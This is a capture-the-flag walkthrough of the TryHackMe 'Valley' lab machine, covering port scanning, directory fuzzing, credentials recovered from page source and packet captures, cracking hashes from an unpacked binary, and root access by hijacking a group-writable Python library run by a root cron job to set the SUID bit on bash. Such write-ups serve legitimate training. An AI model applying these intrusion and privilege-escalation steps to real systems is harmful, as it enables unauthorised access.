Valley TryHackMe Writeup

logo

Scanning

We scan the open ports with the nmap tool with scripts and software versions.

nmap -p22,80,37370 10.10.140.77 -sVC -oN nmap.txt
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-27 10:32 CEST
Nmap scan report for 10.10.140.77
Host is up (0.049s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c2842ac1225a10f16616dda0f6046295 (RSA)
|   256 429e2ff63e5adb51996271c48c223ebb (ECDSA)
|_  256 2ea0a56cd983e0016cb98a609b638672 (ED25519)
80/tcp    open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
37370/tcp open  ftp     vsftpd 3.0.3
Service Info: OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel

Enumeration

Accessing the only web service, we find the gallery software.

We enumerate directory listing at /pricing/:

We download and read note.txt file, this give us a hint, “notes”, Its says it in plural, there must be more than one hidden note.

> cat note.txt
J,
Please stop leaving notes randomly on the website
-RP

We enumerate all directory with wfuzz tool:

000000083:   403        9 L      28 W       277 Ch      "icons"                    
000000168:   200        16 L     58 W       945 Ch      "gallery"                  
000000269:   200        14 L     40 W       566 Ch      "static"                   
000000773:   200        17 L     70 W       1139 Ch     "pricing" 

With the above list of directories, I started to enumerate in depth one by one, until I found the “00” file in the /static/ directory:

> wfuzz -c --hc 404 -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 40 http://10.10.140.77/static/FUZZ

********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.140.77/static/FUZZ
Total requests: 4713

=====================================================================
ID           Response   Lines    Word       Chars       Payload                    
=====================================================================

000000025:   403        9 L      28 W       277 Ch      ".htpasswd"                
000000023:   403        9 L      28 W       277 Ch      ".hta"                     
000000024:   403        9 L      28 W       277 Ch      ".htaccess"                
000000097:   200        5 L      19 W       127 Ch      "00"  <-----                      
000000115:   200        2129 L   22893 W    596160 Ch   "11"                       
000000165:   200        1772 L   16566 W    400103 Ch   "3"                        
000000108:   200        8779 L   85359 W    2162076 C   "10"                       
                                            h                                      
000000116:   200        9815 L   82800 W    2097024 C   "12"                       
                                            h                                      
000000107:   200        10415    97810 W    2352523 C   "1"                        
                        L                   h                                      
000000186:   200        4438 L   41554 W    1129307 C   "9"                        
                                            h                                      
000000181:   200        9284 L   78217 W    2009512 C   "6"                        
                                            h                                      
000000118:   200        16579    137301 W   3488282 C   "13"                       
                        L                   h                                      
000000132:   200        18410    147882 W   3459246 C   "2"                        
                        L                   h                                      
000000120:   200        14242    130114 W   3300836 C   "15"                       
                        L                   h                                      
000000119:   200        16032    140843 W   3646554 C   "14"                       
                        L                   h                                      
000000177:   200        5449 L   51237 W    1353731 C   "5"                        
                                            h                                      
000000183:   200        19521    194371 W   4944368 C   "7"                        
                        L                   h                                      
000000185:   200        33927    310482 W   7525600 C   "8"                        
                        L                   h                                      
000000171:   200        33504    311545 W   7051400 C   "4"                        
                        L                   h                                      

Total time: 11.93464
Processed Requests: 4713
Filtered Requests: 4694
Requests/sec.: 394.9005

We access the file and find some notes from the developer valleyDev, with a development path that has not yet been removed.

We access the path and find an administration panel.

Exploitation

We see the source code and find the hardcoded credentials:

We access the file “devNotes37370.txt” and found the hint for the FTP connection with the credentials.

We connection to the FTP service, enumerate three PCAP files and download all files:

> ftp 10.10.140.77 37370
Connected to 10.10.140.77.
220 (vsFTPd 3.0.3)
Name (10.10.140.77:kali): ******
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||63011|)
150 Here comes the directory listing.
-rw-rw-r--    1 1000     1000         7272 Mar 06 13:55 siemFTP.pcapng
-rw-rw-r--    1 1000     1000      1978716 Mar 06 13:55 siemHTTP1.pcapng
-rw-rw-r--    1 1000     1000      1972448 Mar 06 14:06 siemHTTP2.pcapng
226 Directory send OK.
ftp> 

We open to the files with Wireshark or NetworkMiner, enumerate other credentials in an HTTP service:

We reuse the credentials found in the SSH service and read the user.txt file:

> ssh valleyDev@10.10.140.77
The authenticity of host '10.10.140.77 (10.10.140.77)' can't be established.
ED25519 key fingerprint is SHA256:cssZyBk7QBpWU8cMEAJTKWPfN5T2yIZbqgKbnrNEols.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.140.77' (ED25519) to the list of known hosts.
valleyDev@10.10.140.77's password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-139-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

 * Introducing Expanded Security Maintenance for Applications.
   Receive updates to over 25,000 software packages with your
   Ubuntu Pro subscription. Free for personal use.

     https://ubuntu.com/pro
valleyDev@valley:~$ sudo -l
[sudo] password for valleyDev: 
Sorry, user valleyDev may not run sudo on valley.
valleyDev@valley:~$ ls -lna
total 24
drwxr-xr-x 5 1002 1002 4096 Mar 13 08:17 .
drwxr-xr-x 5    0    0 4096 Mar  6 13:19 ..
-rw-r--r-- 1    0    0    0 Mar 13 09:03 .bash_history
drwx------ 3 1002 1002 4096 Mar 20 20:02 .cache
drwx------ 4 1002 1002 4096 Mar  6 13:18 .config
drwxr-xr-x 3 1002 1002 4096 Mar  6 13:18 .local
-rw-rw-rw- 1    0    0   24 Mar 13 08:17 user.txt
valleyDev@valley:~$ cat user.txt 
THM{****************}
valleyDev@valley:~$ 

Privilege Escalation

We enumerate the valleyAuthenticator file and download the file in our machine.

valleyDev@valley:/mnt$ cd /home
valleyDev@valley:/home$ ls -lna
total 752
drwxr-xr-x  5    0    0   4096 Mar  6 13:19 .
drwxr-xr-x 21    0    0   4096 Mar  6 15:40 ..
drwxr-x---  4 1001 1001   4096 Mar 20 20:03 siemDev
drwxr-x--- 16 1000 1000   4096 Mar 20 20:54 valley
-rwxrwxr-x  1 1000 1000 749128 Aug 14  2022 valleyAuthenticator
drwxr-xr-x  5 1002 1002   4096 Mar 13 08:17 valleyDev
valleyDev@valley:/home$ 

valleyDev@valley:/home$ file valleyAuthenticator
valleyAuthenticator: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, no section header
valleyDev@valley:/home$ 

We execute binary, testing with an credentials and we can see that it does not work:

> chmod +x valleyAuthenticator

> ./valleyAuthenticator
Welcome to Valley Inc. Authenticator
What is your username: valleyDev
What is your password: ********
Wrong Password or Username

We use binary strings in the valleyAuthenticator file and we can see that it has been protected with UPX tool:

> strings valleyAuthenticator | more
UPX!
"E&8
/p8S
a64\

But, we can use the flag “-d” for descompress the file with UPX tool:

> upx -d valleyAuthenticator
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2020
UPX 3.96        Markus Oberhumer, Laszlo Molnar & John Reiser   Jan 23rd 2020

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
   2285616 <-    749128   32.78%   linux/amd64   valleyAuthenticator

Unpacked 1 file.

> strings valleyAuthenticator | more
<$I9
|$0H
D$@H9
D$0H
D$@H
D$ H
D$ H
<$H9
<$H9
<$H9
AVAUL
<$H9
<$H9
=wq
u+UH

We open the binary with the Frida tool and enumerate two hashes in MD5:

We can use the page hashes.com and decrypt the hashes in seconds:

We authenticated with the valley’s credentials and we can see that we belong to the group “valleAdmin”:

valleyDev@valley:/home$ su valley
Password: 
valley@valley:/home$ sudo -l
[sudo] password for valley: 
Sorry, user valley may not run sudo on valley.
valley@valley:/home$ ls -lna
total 752
drwxr-xr-x  5    0    0   4096 Mar  6 13:19 .
drwxr-xr-x 21    0    0   4096 Mar  6 15:40 ..
drwxr-x---  4 1001 1001   4096 Mar 20 20:03 siemDev
drwxr-x--- 16 1000 1000   4096 Mar 20 20:54 valley
-rwxrwxr-x  1 1000 1000 749128 Aug 14  2022 valleyAuthenticator
drwxr-xr-x  5 1002 1002   4096 Mar 13 08:17 valleyDev
valley@valley:/home$ id
uid=1000(valley) gid=1000(valley) groups=1000(valley),1003(valleyAdmin)
valley@valley:/home$ cd valley
valley@valley:~$ ls -lna
total 84
drwxr-x--- 16 1000 1000 4096 Mar 20 20:54 .
drwxr-xr-x  5    0    0 4096 Mar  6 13:19 ..
-rw-------  1 1000 1000    0 Mar 21 07:30 .bash_history
-rw-r--r--  1 1000 1000  220 Aug 15  2022 .bash_logout
-rw-r--r--  1 1000 1000 3771 Aug 15  2022 .bashrc
drwx------ 12 1000 1000 4096 Mar 20 20:02 .cache
drwx------ 14 1000 1000 4096 Mar  6 13:45 .config
drwxr-xr-x  2 1000 1000 4096 Mar  3 10:01 Desktop
drwxr-xr-x  2 1000 1000 4096 Aug 11  2022 Documents
drwxr-xr-x  2 1000 1000 4096 Mar  6 13:39 Downloads
drwxrwxrwx  2 1000 1000 4096 Mar 20 15:06 exp_dir
drwx------  3 1000 1000 4096 Mar  3 10:28 .gnupg
drwxr-xr-x  3 1000 1000 4096 Aug 15  2022 .local
drwxr-xr-x  2 1000 1000 4096 Aug 11  2022 Music
drwxr-xr-x  2 1000 1000 4096 Aug 11  2022 Pictures
-rw-r--r--  1 1000 1000  807 Aug 15  2022 .profile
drwxr-xr-x  2 1000 1000 4096 Aug 11  2022 Public
-rw-rw-r--  1 1000 1000   66 Aug 15  2022 .selected_editor
drwx------  2 1000 1000 4096 Aug 15  2022 .ssh
drwxr-xr-x  2 1000 1000 4096 Aug 11  2022 Templates
drwxr-xr-x  2 1000 1000 4096 Aug 11  2022 Videos
-rw-rw-r--  1 1000 1000  174 Mar 20 14:42 .wget-hsts
valley@valley:~$ 

We launch the pspy tool and enumerate a Python script executed with root user:

We don’t have permission to writed the file, but we see the base64 python library:

valley@valley:~$ ll python3 /photos/script/photosEncrypt.py
ls: cannot access 'python3': No such file or directory                                      
-rwxr-xr-x 1 root root 621 Mar  6 15:43 /photos/script/photosEncrypt.py*                    
valley@valley:~$                                                           

valley@valley:~$ ll python3 /photos/script/photosEncrypt.py
ls: cannot access 'python3': No such file or directory                                      
-rwxr-xr-x 1 root root 621 Mar  6 15:43 /photos/script/photosEncrypt.py*                    
valley@valley:~$ cat /photos/script/photosEncrypt.py                                        
#!/usr/bin/python3                                                                          
import base64                                                                               
for i in range(1,7):                                                                        
# specify the path to the image file you want to encode                                     
        image_path = "/photos/p" + str(i) + ".jpg"                                          
                                                                                            
# open the image file and read its contents                                                 
        with open(image_path, "rb") as image_file:                                          
          image_data = image_file.read()                                                    
                                                                                            
# encode the image data in Base64 format                                                    
        encoded_image_data = base64.b64encode(image_data)                                   
                                                                                            
# specify the path to the output file                                                       
        output_path = "/photos/photoVault/p" + str(i) + ".enc"                              
                                                                                            
# write the Base64-encoded image data to the output file                                    
        with open(output_path, "wb") as output_file:                                        
          output_file.write(encoded_image_data)                                             
valley@valley:~$   

We see the permission for the base64.py file, we can see that it can be edited and executed by the root user or by the “valleAdmin” group, and we belong to this one!

valley@valley:/photos$ ll /usr/lib/python3.8/base64.py 
-rwxrwxr-x 1 root valleyAdmin 20382 Mar 13 03:26 /usr/lib/python3.8/base64.py*
valley@valley:/photos$ id
uid=1000(valley) gid=1000(valley) groups=1000(valley),1003(valleyAdmin)
valley@valley:/photos$ 

We edit the file, import the “os” library to execute a line that allows us to escalate privileges on a bash:

We see the current status of the bash, wait a few minutes until the scheduled task is executed and we see that it has worked, so we raise a bash granting us the inherited permissions and read the root.txt file

valley@valley:/photos$ ll /usr/bin/bash
-rwxr-xr-x 1 root root 1183448 Apr 18  2022 /usr/bin/bash*
valley@valley:/photos$ ll /usr/bin/bash
-rwsr-xr-x 1 root root 1183448 Apr 18  2022 /usr/bin/bash*

valley@valley:/photos$ /usr/bin/bash -p
bash-5.0# id 
uid=1000(valley) gid=1000(valley) euid=0(root) groups=1000(valley),1003(valleyAdmin)
bash-5.0# ls -lna /root
total 56
drwx------  8 0 0 4096 Mar 13 08:17 .
drwxr-xr-x 21 0 0 4096 Mar  6 15:40 ..
-rw-------  1 0 0    0 Mar 21 07:30 .bash_history
-rw-r--r--  1 0 0 3106 Dec  5  2019 .bashrc
drwx------  2 0 0 4096 Mar 20 20:04 .cache
drwxr-xr-x  4 0 0 4096 Mar  6 13:02 .config
drwx------  4 0 0 4096 Aug 15  2022 .gnupg
drwxr-xr-x  3 0 0 4096 Aug 11  2022 .local
-rw-------  1 0 0   49 Mar  3 10:19 .mysql_history
-rw-r--r--  1 0 0  161 Dec  5  2019 .profile
-rw-r--r--  1 0 0   37 Mar 13 08:17 root.txt
-rw-r--r--  1 0 0   66 Aug 15  2022 .selected_editor
drwx------  3 0 0 4096 Aug 11  2022 snap
drwx------  2 0 0 4096 Aug 14  2022 .ssh
-rw-r--r--  1 0 0  222 Aug 15  2022 .wget-hsts
bash-5.0# cat /root/root.txt
THM{********************}
bash-5.0#